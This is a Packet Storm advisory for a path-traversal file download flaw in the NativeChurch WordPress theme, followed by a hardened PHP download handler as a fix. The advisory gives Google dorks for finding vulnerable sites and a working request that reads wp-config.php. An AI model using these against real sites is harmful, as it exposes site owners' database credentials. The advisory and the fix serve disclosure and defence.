Packet Storm advisory PACKETSTORM:151851, by KingSkrupellos
Published: Feb 25, 2019

WordPress NativeChurch Multi-Purpose 5.0.x File Download

`####################################################################  
  
# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 26/02/2019  
# Vendor Homepage : themeforest.net  
# Software Information Link : themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x   
Compatible with Bootstrap 3.x - bbPress 2.5.x  
From WooCommerce 2.1.x To WooCommerce 3.4.x,   
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"  
inurl:''inurl:/wp-content/themes/NativeChurch/download/''  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
CWE-23 [ Relative Path Traversal ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
####################################################################  
  
# Software Description :
***************************
NativeChurch is a powerful WordPress theme designed and developed for church,
charity, non-profit and religious websites. It also comes in handy for
portfolio and corporate websites.
  
####################################################################  
  
# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers
download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context
of the web server process. Information obtained may aid in further attacks.
Attackers can use a browser to exploit this issue.

* The software uses external input to construct a pathname that should be within a
restricted directory, but it does not properly neutralize sequences
such as ".." that can resolve to a location that is outside of that directory.
  
####################################################################  
  
# Arbitrary File Download Exploit :  
******************************  
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php  
  
# Example of the information exposed in the WordPress MySQL configuration file :
***********************************************************
/** WordPress database name. */
define('DB_NAME',

/** MySQL database user. */
define('DB_USER',

/** MySQL database password. */
define('DB_PASSWORD',

/** MySQL host address. */
define('DB_HOST',
  
###################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`
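
The relative path traversal (CWE-23) described under Impact is closed by resolving the requested name first and then checking that the result still lies inside the intended directory. The handler below is an added example, not the NativeChurch theme's code or the vendor's fix; the `files` directory, the `resolve_download` function and the `ALLOWED_EXTENSIONS` list are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened download handler, not the theme's own code.
// Assumption: downloadable files live in a "files" directory beside this script.

const ALLOWED_EXTENSIONS = ['pdf', 'mp3', 'jpg', 'png'];   // assumed allow-list

/**
 * Resolve a user-supplied name to a real path inside $baseDir.
 * Returns null if the path escapes the directory, does not exist,
 * or is not one of the allowed file types.
 */
function resolve_download(string $baseDir, $requested): ?string
{
    $base = realpath($baseDir);
    // Reject non-string input (e.g. file[]=x), empty names and embedded NUL bytes.
    if ($base === false || !is_string($requested) || $requested === ''
        || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, so the containment check sees
    // the location the filesystem would actually open, not the string as typed.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment: the resolved path must begin with the base directory plus a
    // separator (the separator stops "/srv/files-private" matching "/srv/files").
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Extension allow-list: even inside the directory, never serve .php or config files.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXTENSIONS, true) ? $target : null;
}

$path = resolve_download(__DIR__ . '/files', $_GET['file'] ?? null);
if ($path === null) {
    http_response_code(404);   // same response for every rejection reason
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'
    . addcslashes(basename($path), '"\\') . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this check, a request for `../../../../wp-config.php` resolves to a path outside `files` and receives a 404 instead of the file contents.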